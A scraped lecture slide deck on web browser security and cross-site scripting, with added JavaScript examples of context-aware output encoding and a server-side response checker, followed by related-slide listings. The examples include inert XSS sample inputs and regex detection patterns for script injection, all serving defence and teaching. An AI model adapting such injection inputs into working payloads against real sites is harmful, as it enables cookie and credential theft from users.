Odyssey to Web Browser Security - 1

Prepared by: Prosunjit Biswas
Advisor: Dr. Ravi Sandhu
Presented: ICS @ UTSA (12th April, 2012)
Email: prosun.csedu@gmail.com
What are Web Browsers for?

• Web browsers retrieve, present and traverse information on the Web, typically provided by web servers.

• Web browsers use URIs/URLs to locate and retrieve information.
HTTP Request (URL) format

"protocol:" "//" host [ ":" port ] [ abs_path [ "?" query ]]

Examples:
1. http://cs.utsa.edu/index.html
2. http://utsa.summon.serialssolutions.com/search/results?spellcheck=true&q=security
3. http://www.php.net/manual/en/reserved.variables.get.php
4. http://www.amazon.com/s/ref=nb_sb_noss/185-1213459-6355102?url=search-alias%3Daps&field-keywords=iphone
Notice…

• The ‘query’ part of the URL may contain user-provided data that is fed to the application.

• It is therefore where the payload for most possible attacks is carried.
Web Application Architecture: Server Side & Client Side

Courtesy: “Top 10 attacks” by Saumil Shah

How is a Request resolved by the Server for the Browser?
Server Response at Browser Side

Server response includes:
  o Data/information (e.g. personal info)
  o HTML markup (tables, paragraphs)
  o JavaScript / other script
  o Cookies (session information)
  o Browser configuration metadata
  o Other resources (e.g. Flash, CSS)
HTML Markup

• HTML markup provides the presentation for the data/content.

• In Web 2.0, data and markup together build the Document Object Model (DOM).

• The DOM forms an XML-like tree structure for easy retrieval of data.
Script / JavaScript

• When we say Dynamic HTML (DHTML), the dynamic behaviour is achieved by JavaScript on the browser side.

• JavaScript can manipulate (insert/delete/modify) any content in the browser.

• Unfortunately it is ‘The World's Most Misunderstood Programming Language’
                     -- Douglas Crockford
Where to put JavaScript in a web page?

• Typically JS can be put in almost any place.
• <script> JS content </script>
• <input onclick="JS content">
• <img src="javascript:JS content">
• And others.
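The three placement points above each need their own output treatment. The following is an added example, not code from the slides: a hypothetical search-results page for www.goodhost.com that renders two user-provided request parameters (the search text and a "back" link) into a script block, a quoted attribute and a URL attribute, first unsafely and then with context-aware encoding. All function names are assumptions.

```javascript
// Escape for an HTML text node or a quoted attribute value: the five characters
// that can open markup or terminate the attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Inside a <script> block: JSON.stringify yields a valid JS string literal, and
// escaping "<" stops a "</script>" inside the data from closing the block early.
function scriptString(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c');
}

// For href/src: only http(s) URLs get through, resolved against the site's own
// origin; a "javascript:" (or any other) scheme is replaced by a harmless "#".
function safeUrl(s, base = 'https://www.goodhost.com/') {
  try {
    const u = new URL(String(s), base);
    if (u.protocol === 'http:' || u.protocol === 'https:') return u.href;
  } catch (e) { /* unparsable input falls through to the safe default */ }
  return '#';
}

// The "before": both parameters pasted straight into the three placement contexts.
function renderResultsUnsafe(query, returnTo) {
  return `<script>var lastQuery = "${query}";</script>\n` +
         `<input type="text" value="${query}">\n` +
         `<a href="${returnTo}">Back</a>`;
}

// The "after": each value encoded for the context it lands in.
function renderResultsSafe(query, returnTo) {
  return `<script>var lastQuery = ${scriptString(query)};</script>\n` +
         `<input type="text" value="${escapeHtml(query)}">\n` +
         `<a href="${escapeHtml(safeUrl(returnTo))}">Back</a>`;
}

// Constructed sample inputs (not captured attack data): a query that tries to
// close the script block, and a "back" link that uses the javascript: scheme.
const SAMPLE_QUERY = '</script><script>/*injected*/</script>';
const SAMPLE_RETURN = 'javascript:/*injected*/';

console.log('--- unsafe ---\n' + renderResultsUnsafe(SAMPLE_QUERY, SAMPLE_RETURN));
console.log('--- safe ---\n' + renderResultsSafe(SAMPLE_QUERY, SAMPLE_RETURN));
```

In the safe output the query survives as data in all three places (the script variable still holds the original text once the browser decodes the literal), but no new script placement point is created.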
How can Web Browsing be insecure?

• Attacker steals data [attack on user information]
• Attacker defaces a web page [attack on markup]
• Inject / modify JavaScript [script-based attack]
• Steal cookies
• Insert metadata on the page
• Attack other resources [e.g. images]
Notice…

• All the attacks mentioned can be achieved by injecting / modifying JavaScript on an honest web page.
Risk That We Do Not Care About…

• A website is malicious, and a user visits this site and gets infected.
  [We can leave this to the discretion of the visitor]

Risk That We Care About (2)…

• A website is not intended to be malicious, but an attacker has compromised the page and lets everyone who visits it be compromised.
  o [We do care about this]
Attacking Approach (Client-server Perspective)

• Attack servers / services [server-side attack]
  o e.g. website defacement,
  o SQL injection,
  o DoS attacks and others
• Attack the web client [client / browser-based attack]
  o e.g. XSS (Cross-Site Scripting)
  o XSRF (Cross-Site Request Forgery)
  o Phishing (social engineering) and others
Attacking Approach (Way of Attacks)

• Content injection
  o SQL injection
  o Script injection (XSS)
  o DOM element injection (DOM-based XSS)
• Breaking access control / access restriction
  o Cross-domain / cross-frame attacks
  o e.g. cross-domain capability leaks
• Exploiting application configuration
  o Session hijacking / credential stealing
  o Failure to restrict URL access
  o Insecure cryptography

Attacking Approach (Way of Attacks) continued…

• Insecure network
  o Proxy-based attacks
  o Man-in-the-middle attacks

• Web-based malware attacks

We are more interested in content injection attacks because of their wide attack surface.
Content Injection (Through URL)
Demonstrating Reflected XSS attack

[Diagram: the attacker sends the URL www.goodhost.com?search=@#badcontent#@ through email / other way; the user clicks the URL in the client web browser; the browser sends @#badcontent#@ in its request to the web server, and @#badcontent#@ comes back in the server's response. User is infected with the injection attack.]
Content Injection (via comment)
Demonstrating ‘Stored XSS attack’

[Diagram: the attacker puts a malicious comment @#comment!@# on the page, and it is inserted in the DB; Bob requests the same page; the malicious comment is retrieved from the database and returned to Bob with the page.]
Content Injection Attack (2) (What content?)

• SQL (data integrity & privacy attack)
• Script / JavaScript (privacy attack – steal cookie)
• DOM element (data integrity – phishing)

We are more interested in the script injection attack (also called XSS), which is easy and obvious, but whose impact is severe and therefore critical to handle.
Why do attackers prefer JavaScript injection?

• JavaScript can access almost all resources in a web page.
• JavaScript is supported by all major browsers.
• JavaScript has great expressive power.
Consequences of an XSS attack

• Sensitive information theft.
  o Credential theft (e.g. cookies)

• Intranet scanning
  o Scan open ports.

• Attacking other users
  o Replay attack from the compromised browser.
What are the Existing Approaches to Protect against XSS attacks?

All the existing approaches place some kind of restriction over JavaScript use.

• Host-based restriction
  o Allow JavaScript from whitelisted hosts.
  o Restrict JavaScript from blacklisted hosts.

• Placeholder restriction
  o Restrict the places where JavaScript can be inserted.

What are the Existing Approaches to Protect against XSS attacks… (continued)

• Transfer restriction
  o Restrict sensitive resources from being sent out to other hosts/domains.

• Content rewrite
  o Rewrite JavaScript to delete unsafe code.

• Flow control
  o Control the flow of sensitive information in JavaScript (taint sensitive information).
What are other Control Points?

[Diagram: control points around the web server, the browser's JS and DOM, the cookie, and other domains]
  o Input interface: sanitize the URL to discard malicious content; control the flow of user-provided data.
  o Output interface: control JS & DOM interactions; control JS communication with external domains; control cookie send-out to external domains.
  o Compare input / output interface data to check whether malicious content has trespassed through the server.
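As an added example (not code from the slides), here is an output-interface check that applies three of the ideas above to a response before it leaves the server: the input/output comparison from this slide, and the host-based and placeholder restrictions from the previous two slides. It takes the request URL and the response body, and returns findings. The whitelist, the function names and the sample traffic are assumptions; regex scanning is enough for the constructed samples, while a real deployment would walk the HTML with a parser.

```javascript
// Hosts allowed to serve external scripts (host-based restriction; assumed values).
const SCRIPT_HOST_WHITELIST = new Set(['www.goodhost.com', 'static.goodhost.com']);

// Returns a list of human-readable findings; an empty list means the response
// passed all three checks.
function checkResponse(requestUrl, body, whitelist = SCRIPT_HOST_WHITELIST) {
  const findings = [];

  // (1) Input/output comparison: a query value that carries markup-significant
  //     characters and still appears verbatim in the body was not encoded.
  for (const [name, value] of new URL(requestUrl).searchParams) {
    if (/[<>"'&]/.test(value) && body.includes(value)) {
      findings.push(`parameter "${name}" reflected unencoded`);
    }
  }

  // (2) Every <script> is either an external script from a whitelisted host
  //     (host-based restriction) or an inline block (placeholder restriction).
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  for (const [, attrs, inner] of body.matchAll(scriptRe)) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    if (src) {
      let host = '(unparsable)';
      try { host = new URL(src[1], requestUrl).host; } catch (e) { /* keep placeholder */ }
      if (!whitelist.has(host)) findings.push(`script loaded from non-whitelisted host ${host}`);
    } else if (inner.trim() !== '') {
      findings.push('inline script block');
    }
  }

  // (3) The other two placement points from the slides: event-handler
  //     attributes and javascript: URLs in href/src.
  for (const [, handler] of body.matchAll(/\s(on[a-z]+)\s*=/gi)) {
    findings.push(`inline event handler ${handler.toLowerCase()}`);
  }
  for (const [, attr] of body.matchAll(/\b(href|src)\s*=\s*["']?\s*javascript:/gi)) {
    findings.push(`javascript: URL in ${attr.toLowerCase()}`);
  }
  return findings;
}

// Constructed sample traffic (not captured data): the search query carries
// markup; one response echoes it raw next to every kind of script placement,
// the other encodes it and loads only a whitelisted script.
const SAMPLE_REQUEST = 'https://www.goodhost.com/search?q=%3Cb%3Ehi%3C%2Fb%3E';
const UNSAFE_RESPONSE =
  '<h1>Results for <b>hi</b></h1>\n' +
  '<script>track()</script>\n' +
  '<a href="javascript:go()" onclick="go()">again</a>\n' +
  '<script src="http://third-party.example/x.js"></script>';
const SAFE_RESPONSE =
  '<h1>Results for &lt;b&gt;hi&lt;/b&gt;</h1>\n' +
  '<script src="https://static.goodhost.com/app.js"></script>';

console.log('unsafe:', checkResponse(SAMPLE_REQUEST, UNSAFE_RESPONSE));
console.log('safe:  ', checkResponse(SAMPLE_REQUEST, SAFE_RESPONSE));
```

The comparison in step (1) only catches values that come back byte-for-byte, so it is a cheap last-line check rather than a replacement for encoding at the output interface.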

Contenu connexe

Tendances

Modern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensJonathan LeBlanc
 
Micro Web Service - Slim and JWT
Micro Web Service - Slim and JWTMicro Web Service - Slim and JWT
Micro Web Service - Slim and JWTTuyen Vuong
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Securing Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationStefan Achtsnit
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)iMasters
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
 
What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?Derek Edwards
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongDerek Perkins
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 

Tendances (20)

Modern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web Tokens
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Micro Web Service - Slim and JWT
Micro Web Service - Slim and JWTMicro Web Service - Slim and JWT
Micro Web Service - Slim and JWT
 
JSON Web Tokens
JSON Web TokensJSON Web Tokens
JSON Web Tokens
 
Xss
XssXss
Xss
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Securing Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based Authentication
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 
Authentication Concepts
Authentication ConceptsAuthentication Concepts
Authentication Concepts
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
 
What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
 
Json web token
Json web tokenJson web token
Json web token
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 

Similaire à Secure webbrowsing 1

Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격선협 이
 
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBSides Delhi
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthanRaghunath G
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssdcervigni
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Why You Need A Web Application Firewall
Why You Need A Web Application FirewallWhy You Need A Web Application Firewall
Why You Need A Web Application FirewallPort80 Software
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 

Similaire à Secure webbrowsing 1 (20)

Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
 
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security Playground
 
Xss 101
Xss 101Xss 101
Xss 101
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthan
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
 
Vulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVulnerabilities in Web Applications
Vulnerabilities in Web Applications
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Why You Need A Web Application Firewall
Why You Need A Web Application FirewallWhy You Need A Web Application Firewall
Why You Need A Web Application Firewall
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
4.Xss
4.Xss4.Xss
4.Xss
 

Plus de UT, San Antonio

digital certificate - types and formats
digital certificate - types and formatsdigital certificate - types and formats
digital certificate - types and formatsUT, San Antonio
 
Static Analysis with Sonarlint
Static Analysis with SonarlintStatic Analysis with Sonarlint
Static Analysis with SonarlintUT, San Antonio
 
Shellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerabilityShellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerabilityUT, San Antonio
 
Big Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory ComputationBig Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory ComputationUT, San Antonio
 
Enumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) modelEnumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) modelUT, San Antonio
 
Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)UT, San Antonio
 
Security_of_openstack_keystone
Security_of_openstack_keystoneSecurity_of_openstack_keystone
Security_of_openstack_keystoneUT, San Antonio
 
Research seminar group_1_prosunjit
Research seminar group_1_prosunjitResearch seminar group_1_prosunjit
Research seminar group_1_prosunjitUT, San Antonio
 
Attribute Based Encryption
Attribute Based EncryptionAttribute Based Encryption
Attribute Based EncryptionUT, San Antonio
 
Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction UT, San Antonio
 

Plus de UT, San Antonio (20)

digital certificate - types and formats
digital certificate - types and formatsdigital certificate - types and formats
digital certificate - types and formats
 
Saml metadata
Saml metadataSaml metadata
Saml metadata
 
Static Analysis with Sonarlint
Static Analysis with SonarlintStatic Analysis with Sonarlint
Static Analysis with Sonarlint
 
Shellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerabilityShellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerability
 
Abac17 prosun-slides
Abac17 prosun-slidesAbac17 prosun-slides
Abac17 prosun-slides
 
Abac17 prosun-slides
Abac17 prosun-slidesAbac17 prosun-slides
Abac17 prosun-slides
 
Recitation
RecitationRecitation
Recitation
 
Recitation
RecitationRecitation
Recitation
 
Big Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory ComputationBig Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory Computation
 
Enumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) modelEnumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) model
 
Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)
 
Three month course
Three month courseThree month course
Three month course
 
One month-syllabus
One month-syllabusOne month-syllabus
One month-syllabus
 
Zerovm backgroud
Zerovm backgroudZerovm backgroud
Zerovm backgroud
 
Security_of_openstack_keystone
Security_of_openstack_keystoneSecurity_of_openstack_keystone
Security_of_openstack_keystone
 
Research seminar group_1_prosunjit
Research seminar group_1_prosunjitResearch seminar group_1_prosunjit
Research seminar group_1_prosunjit
 
Ksi
KsiKsi
Ksi
 
Attribute Based Encryption
Attribute Based EncryptionAttribute Based Encryption
Attribute Based Encryption
 
Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction
 
Cyber Security Exam 2
Cyber Security Exam 2Cyber Security Exam 2
Cyber Security Exam 2
 

Dernier

Abanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdfAbanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdfAbanoubGhobrial1
 
LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024Bruce Bennett
 
Senior IT Professional with Master’s Degree with 21+ years of experience is...
Senior IT Professional with Master’s Degree with 21+ years of experience   is...Senior IT Professional with Master’s Degree with 21+ years of experience   is...
Senior IT Professional with Master’s Degree with 21+ years of experience is...Anas Acharath Parakat
 
Chapter 4 - Promoting Inclusive Culture.ppt
Chapter 4 - Promoting   Inclusive Culture.pptChapter 4 - Promoting   Inclusive Culture.ppt
Chapter 4 - Promoting Inclusive Culture.pptmoytopo
 
LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024Bruce Bennett
 
4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUES4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUESaishwaryakhare5
 
Human Rights are notes and helping material
Human Rights are notes and helping materialHuman Rights are notes and helping material
Human Rights are notes and helping materialnadeemcollege26
 
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024Hector Del Castillo, CPM, CPMM
 
The Next Things To Immediately Do About Mating Press
The Next Things To Immediately Do About Mating PressThe Next Things To Immediately Do About Mating Press
The Next Things To Immediately Do About Mating Pressmatingpress170
 
Transportation and Trade Part 5 (1) (1).pptx
Transportation and Trade Part 5 (1) (1).pptxTransportation and Trade Part 5 (1) (1).pptx
Transportation and Trade Part 5 (1) (1).pptxSheldon Byron
 
Design, Desire and Demand Presentation.pptx
Design, Desire and Demand Presentation.pptxDesign, Desire and Demand Presentation.pptx
Design, Desire and Demand Presentation.pptxaaronbasko1
 
Network to Success - Using Social Media in Job Search
Network to Success - Using Social Media in Job SearchNetwork to Success - Using Social Media in Job Search
Network to Success - Using Social Media in Job SearchBruce Bennett
 
Soviet pilot Yuri Gagarin was the first person to ever orbit the Earth
Soviet pilot Yuri Gagarin was the first person to ever orbit the EarthSoviet pilot Yuri Gagarin was the first person to ever orbit the Earth
Soviet pilot Yuri Gagarin was the first person to ever orbit the EarthChristina Parmionova
 
Banged Dubai Call Girls O525547819 Call Girls Dubai
Banged Dubai Call Girls O525547819 Call Girls DubaiBanged Dubai Call Girls O525547819 Call Girls Dubai
Banged Dubai Call Girls O525547819 Call Girls Dubaikojalkojal131
 
How to make career in advance 3d animation
How to make career in advance 3d animationHow to make career in advance 3d animation
How to make career in advance 3d animationsantoshjadhav126
 
美国SU学位证,雪城大学毕业证书1:1制作
美国SU学位证,雪城大学毕业证书1:1制作美国SU学位证,雪城大学毕业证书1:1制作
美国SU学位证,雪城大学毕业证书1:1制作ss846v0c
 
Back on Track: Navigating the Return to Work after Parental Leave
Back on Track: Navigating the Return to Work after Parental LeaveBack on Track: Navigating the Return to Work after Parental Leave
Back on Track: Navigating the Return to Work after Parental LeaveMarharyta Nedzelska
 
Career-Orientation-for-Grade-9-and-10.pptx
Career-Orientation-for-Grade-9-and-10.pptxCareer-Orientation-for-Grade-9-and-10.pptx
Career-Orientation-for-Grade-9-and-10.pptxGachaFluffy
 
How to prepare yourself for a job interview.pptx
How to prepare yourself for a job interview.pptxHow to prepare yourself for a job interview.pptx
How to prepare yourself for a job interview.pptxJohnreyFalsarioBasid
 
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptxwaghmare9860lavin
 

Dernier (20)

Abanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdfAbanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdf
 
LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024
 
Senior IT Professional with Master’s Degree with 21+ years of experience is...
Senior IT Professional with Master’s Degree with 21+ years of experience   is...Senior IT Professional with Master’s Degree with 21+ years of experience   is...
Senior IT Professional with Master’s Degree with 21+ years of experience is...
 
Chapter 4 - Promoting Inclusive Culture.ppt
Chapter 4 - Promoting   Inclusive Culture.pptChapter 4 - Promoting   Inclusive Culture.ppt
Chapter 4 - Promoting Inclusive Culture.ppt
 
LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024
 
4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUES4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUES
 
Human Rights are notes and helping material
Human Rights are notes and helping materialHuman Rights are notes and helping material
Human Rights are notes and helping material
 
